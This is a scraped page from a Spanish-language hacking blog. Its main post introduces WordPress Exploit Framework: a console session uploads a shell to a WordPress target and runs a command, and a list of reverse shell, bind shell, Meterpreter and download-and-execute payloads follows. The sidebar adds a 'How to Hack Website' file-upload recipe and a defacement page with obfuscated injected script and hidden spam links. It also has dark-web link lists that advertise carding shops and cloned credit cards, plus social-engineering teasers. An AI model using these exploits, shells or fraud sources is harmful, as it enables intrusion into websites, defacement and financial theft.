Skip to main content

Wordpress Exploit Framework

RedBird

TO SUBSCRIBE

WordPress Exploit FrameWork

posted by RedBird July 09, 2017

WordPress Exploit FrameWork



WPEF or WordPress Exploit FrameWork is a tool developed in ruby, which aims to develop or implement modules for web site penetration testing based on the WordPress CMS.

Open a command line on your terminal in the directory you have downloaded WordPress Exploit Framework, and start it by running. 

Ruby wpxf.rb

Once loaded, you will be presented with the wpxf flag, from here you can search for modules using the search command or load a module using the use command .

Uploading a module in your environment will allow you to set options with the setcommand and view information about the module using info .

The following is an example of how you could load the symposium_shell_upload exploit module, set the module and payload options, and run the exploit against the target.

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully

Auxiliary modules do not allow you to execute payloads on the target machine, but allow you to extract information from the target, escalate privileges, or provide denial of service functionality. 

Exploit modules require you to specify a payload that is subsequently executed on the target machine, allowing you to execute arbitrary code to extract information from the machine, set a remote shell, or anything else you want to do within the context of the web server . 

Available payloads: 
Bind_php: loads a script that will bind to a specific port and allow WPXF to set a remote shell. 
Custom: Load and run a custom PHP script. 
Descarga_exec: downloads and executes a remote executable file. 
Meterpreter_bind_tcp: a Meterpreter binds the TCP payload generated using msfvenom. 
Meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom. 
Exec: Executes a shell command on the remote server and returns the output to the WPXF session. 
Reverse_tcp: loads a script that will establish a reverse TCP shell. 

All of these payloads, with the exception of custom payloads of Meterpreter, will be deleted after they have been executed, to avoid being dropped on the target machine after use or in case they are used to establish a failing shell. 


_______________________________________________________ 

LINKS:













EXPLOIT HACKING PENTESTING TOOLS TUTORIAL O REVIEW VULNERABILIDADES WEB

¿Te Gusto?

Comentarios

RedBird

Psicología - Cómo utilizar la persuasión para comprometer un blanco humano - 7/10/2017WordPress Exploit FrameWork - 7/10/2017Tinfoleak | Tool OSINT para Twitter - 7/8/2017Ransomware NotPetya no Petya - 6/28/2017Ocultar código PHP en un Email | KelvinSecurity - 6/25/2017

Facebook

=TEMAS=

TE RECOMIENDO...

Dándole una lección a un pedofilo adolescente

No mas "CP"

Hace algunas noches en un grupo en Telegram, con la temática de "DEEPWEB" un usuario hizo presencia y al mismo tiempo se dio a notar con todos los integrantes del grupo, a insultarlos. 
Lo que hizo detonar el momento, fue cuando empezo a solicitar CP (Children Porn Pornografía Infantil) entre otras cosas, como lo es el Gore, incluso pregunto por la existencia de grupos que manejan este tipo de contenido. 

Por un instante, se llego a pensar que era solo broma por su parte, sin embargo... 

Después de las advertencias de varios miembros del grupo, con ese mensaje, mas de uno dentro de este grupo, (incluyéndome) quedamos molestos, como si este tipo de contenido fuera algo común y simple... simplemente el solo se apunto con el arma... 
Varios miembros del grupo, comenzaron a mandarle mensajes de manera privada... 

Solo fue cuestión de un poco de tiempo y la aplicacion de Ingeniería Social con este tal "Eduardo" para que pudiera dar con ciertos datos su…

WannaCryptor | It's Not Over!... WannaCry 2.0

WannaCryptor 2.0 
Después del ciber ataque a escala mundial, del ransomware WannaCrypt el cual puso en alerta máxima a cientos de empresas y organizaciones gubernamentales y comprometió la información de otras tantas entre ellas, la que mas destaco Telefonica, se logro controlar la amenaza, por el momento. 
Mas de 200.000 equipos fueron infectados en 99 países, mientras que los ciberdelincuentes han ganado un total de $26.090 de dolares equivalentes a 15 bitcoins.  
Un supuesto investigador, de Reino Unido twiteando como @malwaretehcblog con ayuda de Darien Huss de la firma de seguridad ProofPoint, encontraron por "error" un dominio escondido en el código del ransomware el cual terminaría siendo un KillSwitch, este detendría el ataque. 
De acuerdo con el investigador, el ransomware hace una petición al dominio el cual fue comprado por @malwaretechblog por la cantidad de $10,96 dolares. 
Sin embargo todos los expertos aseguran que las personas quienes fueron las responsables de l…

Hacking de redes WiFi desde un Smartphone | Mala configuración - Fuerza bruta al protocolo WPS

Hacking - Protocolo WPS (PIN) 

Este es el primer vídeo creado por mi, en el cual se muestra un ejemplo sobre el hacking de redes WiFi por medio de un Smartphone utilizando aplicaciones creadas para ello, al mismo tiempo se pretende explicar un poco el tema de "hacking de redes WiFi sobre un smartphone" donde los novatos comenten los errores mas comunes como el buscar aplicaciones para hackear redes WiFi sin tener un previo conocimiento sobre la seguridad de una red, el tipo de ataque para comprometer la red y obtener la contraseña. 
Al final del video tenemos un ejemplo de un ataque por fuerza bruta al protocolo WPS el cual ofrece la conexión por medio de un PIN. 

SkTool | Herramientas de pentesting

SkTool SkTool es una herramienta escrita en Python por THC la cual nos permite instalar una gran cantidad de herramientas de pentesting, entre otras funciones que tiene, como por ejemplo: Limpiar el sistemaActualizar lista de paquetesHacer un upgrade  Para tener esta herramienta, vamos al link en GitHub
---------> GitHub - SkToolsv0.2

Una vez, estando en la pagina, podemos hacer clonar o descargar el .zip




En mi caso, sera desde la terminal.
Una vez tengamos ubicado el lugar donde queremos que esta se clone ingresamos la siguiente linea de comando

sudo git clone https://github.com/SkriptedSEC/SkToolsv0.2.git

y damos enter...

CURSO | SQL - MySQL - NoSQL - MongoDB - VideoTutoriales

SQL - MySQL - NoSQL - MongoDB - VideoTutoriales

Link de Descarga: https://mega.nz/#F!mwJ3AZLK

Clave de Cifrado: !_F3ecy2ikMmMBL9aveKHpQ

Pentesting a redes WiFi | FASE DE RECOLECCIÓN DE INFORMACIÓN

FASE DE RECOLECCIÓN DE INFORMACIÓN 
Para poder iniciar con nuestro pentesting a una red debemos de cumplir con un conjunto de procesos, desde la recopilación de información, hasta las post-explotación. 
En esta primer fase, que es la de recopilar toda la información posible de nuestro objetivo. Para eso debemos tener un conjunto de herramientas con las cuales podemos recopilar información, muy aparte de las herramientas tenemos que utilizar hardware, en este caso antenas para WiFi en escenarios mas simples, podemos trabajar con la tarjeta de red inalambrica de nuestro equipo, pero esto no es lo mas recomendable. 
Por el simple hecho, de que no seria algo normal ver afuera de la empresa, casa o lugar en donde se realizara las pruebas de seguridad. 
¿Antenas WiFi para pentesting? Ahora debemos de tener en cuenta una antena con la cual poder realizar nuestra auditoria. No hablo de la implementación de antenas tácticas (uso militar) sin embargo una antena que nos pueda ser de ayuda durante n…

Propagación de Malware | 1 - Automatización

Propagación de Malware

Como se conoce y a su vez ya lo he mencionado  las tecnologías han avanzado de igual manera que las amenazas que los acompañan. Cunado se hace mención del método o técnica para propagar malware se pueden describir muchas, todas con un nivel de éxito o de fracaso casi igual, ya que muchas veces se depende de factores externos. 
Este avance de amenazas y de propagación sugiere tener un conocimiento mas avanzado sobre las amenazas que pueden comprometer todo un entorno informático, desde una Pc hasta una red de servidores privada, esto implica tener mecanismos para poder defendernos de estas amenazas al igual que tener un plan que nos ayude en caso de ser victima de alguna de estas amenazas, y estos a su vez deben de estar a la altura de la amenaza. 
Creación automatizada de malware La cantidad de variantes crece de forma casi incontrolable al igual que su detección, pues los atacantes propagan estas amenazas atraves de Internet,  como ejemplo tenemos a los laborato…

UltraSurf | Seguridad, Privacidad y Anonimato

Anonimato rápido 
La seguridad, privacidad y anonimato son cosas que usuarios y cibercrimanles buscan, al momento de establecer una conexión a Internet con el fin de que su informacion, ubicación y demás datos permanezcan "ocultos", para lograr este tipo de tareas, existen muchos programas que nos pueden ayudar pero hasta cierto punto.  
Uno de los programas interesante sobre este tema es UltraSurf  es un proxy gratuito. Ultrasurf fue creado por la empresa UltraReach Corporacion de Internet con el fin de ayudar a usurarios en China con el fin de convatir la censura y permitir a los usuarios navegar en paginas bloqueadas o prohibidas por diferentes motivos. 
Este software nos ofrece privacidad en linea una seguridad con encriptacion de extremo a extremo y algo que lo hace destacar es que no requiere de instalación alguna basta con simplemente ejecutar el software y listo. 
 Después de su descarga en su pagina oficial (AL FINAL DEL POST) podemos tener un archivo .zip el cual conti…

Psicología - Cómo utilizar la persuasión para comprometer un blanco humano

Psicología
Cómo utilizar la persuasión para comprometer un blanco humano 

La ingeniería social es noticia porque el comportamiento humano es a menudo el eslabón más débil de objetivos aún bien defendidas. herramientas de ingeniería social automatizados pueden ayudar a los hackers solitarios tocan estas técnicas, pero el estudio de cómo cortar las interacciones humanas en persona es a menudo ignorada. Hoy en día, vamos a examinar cómo utilizar sutil, difícil de detectar las técnicas de persuasión para comprometer un objetivo humano.  
Hoy en día la ingeniería social ¿Dónde han ido todos los grandes estafadores? Los inteligentes que sería entusiasmar a la gente acerca de la división de un billete de lotería premiado falso y luego dejar que la víctima conducir alegremente a un cajero automático para meter dinero en efectivo en el bolsillo del ladrón? 
No han desaparecido, han simplemente se convierten en un elemento perturbador e impredecible en las filas crecientes de los hackers y tecno-c…

Android IMSI-Catcher Detector | Detecta receptores IMSI

IMSI-Catcher

Un receptor IMSI es esencialmente una torre móvil falsa que actúa entre el teléfono (s) móviles objetivo y los proveedores de servicios verdaderas torres. Como tal se considera un ataque del Hombre en el medio (MITM). Se usa como un dispositivo que escucha a escondidas usado para interceptación y rastreo de teléfonos celulares y por lo general es no detectable para los usuarios de teléfonos móviles. Tal estación del transceptor bajo virtual (VBTS) es un dispositivo para identificar International Mobile Subscriber Identity (IMSI) de un teléfono móvil del GSM cercano e interceptar sus llamadas. Se patentó y primero comercializado por Rohde & Schwarz, aunque fuera difícil mantener tal patente, ya que en realidad es sólo una torre de la célula modificada con un operador malévolo. El 24 de enero de 2012, el Tribunal de apelación de Inglaterra y País de Gales creyó que la patente es inválida para la evidencia. 
Actualmente en el mercado es posible adquirí varios modelos de …

 Powered by Blogger.

Julio Augusto Rangel Medina "Drok3r"

Comments

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...